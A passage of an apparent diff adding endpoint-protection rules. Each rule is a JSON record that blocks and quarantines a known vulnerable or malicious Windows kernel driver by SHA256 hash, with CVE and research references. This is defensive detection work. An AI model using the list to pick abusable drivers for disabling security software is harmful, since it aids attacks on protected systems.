"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818265Z", + "creation_date": "2026-03-23T11:45:31.818268Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818276Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a39fe7b7cc504ed53435aefd9050f7bebe2115e87f6089006f0ad26404e52419", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ebebc4b-0827-5d4f-8583-39cd88fa0c0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823361Z", + "creation_date": "2026-03-23T11:45:31.823364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823373Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec97b2ca7836cba139fd394132a06b7eaaff3f78a15110a28acf6368e9837148", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ec416e2-9b78-5ca8-92bf-57c184d2347e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483597Z", + "creation_date": "2026-03-23T11:45:31.483601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ddb52f71b17725e01328632bc62197d8d880b6e349a7f96e153a8e3e1520e77", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ecbf4ee-d4fb-5b07-a4aa-ee2060c2fd2b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974108Z", + "creation_date": "2026-03-23T11:45:29.974110Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ecd07df7ad6fee9269a9e9429eb199bf3e24cf672aa1d013b7e8d90d75324566", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ed85ee6-98ce-5007-9860-0154fe9eb079", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819498Z", + "creation_date": "2026-03-23T11:45:30.819500Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819506Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3cb111fdedc32f2f253aacde4372b710035c8652eb3586553652477a521c9284", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ee8010b-fc28-55d5-a9f8-aaaf94cdc63a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452708Z", + "creation_date": "2026-03-23T11:45:30.452712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bf4cced4209c73aa37a9e2bf9ff27d458d8d7201eefa6f6ad4849ee276ad158", + "comment": "Vulnerable Kernel Driver (aka fiddrv64.sys) [https://www.loldrivers.io/drivers/64f3d4b0-6d2b-4275-b3d4-15d092af4092/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8eeb1a20-0b06-589e-9cbf-a3c417ce9606", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981700Z", + "creation_date": "2026-03-23T11:45:29.981704Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.981713Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b205838a8271daea89656b1ec7c5bb7244c42a8b8000d7697e92095da6b9b94", + "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8eec39d2-f7a3-50d7-9b99-d65f67de243a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622759Z", + "creation_date": "2026-03-23T11:45:29.622761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a520ff5c754a1fb62ba88399a313d0c0fb99145ba2d3d91dbf4282388b77fa84", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8ef5479c-0d31-5922-8c12-5a25ca1fb5ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828365Z", + "creation_date": "2026-03-23T11:45:30.828367Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828372Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "164e53bcd4af4a0cf7773f7570f43a8370521e3fba8e7da76fe6e46d93c54375", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8efc4026-0508-5aba-880e-6f6a6a92e56c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490419Z", + "creation_date": "2026-03-23T11:45:31.490421Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490427Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "fed4296d2bd088e45850ef09c5f1f598b926a3602dab71e921e8a881af2dfb39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8eff5a5f-b3c8-588f-a808-fbb2ba6cfd6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455730Z", + "creation_date": "2026-03-23T11:45:30.455734Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6701433861742c08eb50f1e785962378143ad5b6c374ac29118168599f8a0f1c", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f0437d6-ffb1-5479-b7d3-b2423efd37ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145659Z", + "creation_date": "2026-03-23T11:45:32.145661Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "930da474a6d1be97b54f2c81e883e14d62897aa58622e5b040e412bd36cee0a7", + "comment": "Malicious Kernel Driver (aka driver_930da474.sys) [https://www.loldrivers.io/drivers/4c4e7664-af86-4483-858a-f59346f3d304/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f098271-1543-5b6a-a9bf-00949da16756", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818208Z", + "creation_date": "2026-03-23T11:45:30.818210Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818215Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb59a641adb623a65a9b5af1db2ffd921fd1ca1bc046a6df85d5f2e00fd0b5a5", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f0a1565-5a6a-556d-8cb8-03d08d57f17f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160720Z", + "creation_date": "2026-03-23T11:45:31.160722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee73362a7b874688da240e0c26e85b9f94ff012708f57fdedaee8d81b015baba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f0c8bbe-2a1e-5a2e-93c4-8f510fd52491", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455052Z", + "creation_date": "2026-03-23T11:45:30.455055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "40c45c9b1c764777096b59f99ae524cbd25b88c805187e615c3ed6840f3d4c15", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f172986-bb69-5d6a-934d-6c35d5d798c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460264Z", + "creation_date": "2026-03-23T11:45:30.460268Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460277Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ab48bf8c099611b217cc9f78af2f92e9aaeedf1cea4c95d5dd562f51e9f0d09", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f1c5ec8-cc49-5fe3-b6fd-568f18f93780", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140418Z", + "creation_date": "2026-03-23T11:45:31.140420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140426Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a56f9efee818f2d92cbcaa4025d4a40ec1a32243226c3df5f6db8fb6be769e4b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f1e87c1-621f-5148-9adc-ad850f97e833", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821470Z", + "creation_date": "2026-03-23T11:45:30.821474Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821483Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "767ef5c831f92d92f2bfc3e6ea7fd76d11999eeea24cb464fd62e73132ed564b", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f218bde-cd11-5551-bcd3-3ba5b37d7d07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144481Z", + "creation_date": "2026-03-23T11:45:31.144483Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144489Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "885c386e3349ab5feb9c8f53eb9d72c6cc0e34e7decb1cc67ca60d4ed55aff9f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f24dfd0-32a7-58d2-8904-3a01a495c6c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482979Z", + "creation_date": "2026-03-23T11:45:31.482983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482994Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23acb0b9873f8b4bfdd2ad9583a32d42bbd8ffa9ffa63ee6c56d2f2c36822caa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f2a7991-19dd-5588-b793-decfa50b507c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159104Z", + "creation_date": "2026-03-23T11:45:31.159106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159111Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebd5013c06979f4b14956b2b912d821a1afc2e78eb22e8e1f303f26c3afe6168", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f2b33ae-861a-5e42-87ea-ae3c5dd272de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483629Z", + "creation_date": "2026-03-23T11:45:31.483633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483642Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f2439b26ab2a365ae0014bbc008f78d9f1bb8772661de5600d21b61d9beffd4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f2ead5c-ee58-579a-a96e-8a638e52ad4c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982159Z", + "creation_date": 
"2026-03-23T11:45:29.982161Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "acb65f96f1d5c986b52d980a1c5ea009292ff472087fdd8a98a485404948f585", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/b03798af-d25a-400b-9236-4643a802846f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f367a89-bb24-5471-aea6-0f915052d013", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482916Z", + "creation_date": "2026-03-23T11:45:31.482920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482930Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85620e543732b4d53062cdbf61d924ac29accbf7e6ea663fc39fd0c9a12900d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8f3ac8a8-317d-535f-920e-dadf8135e37f", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830492Z", + "creation_date": "2026-03-23T11:45:30.830495Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0019c165b4c461fcdd455c6d78ab0ac4a28b7b57f6dff09d42d8f334e8b6c4bd", + "comment": "Vulnerable Adlice 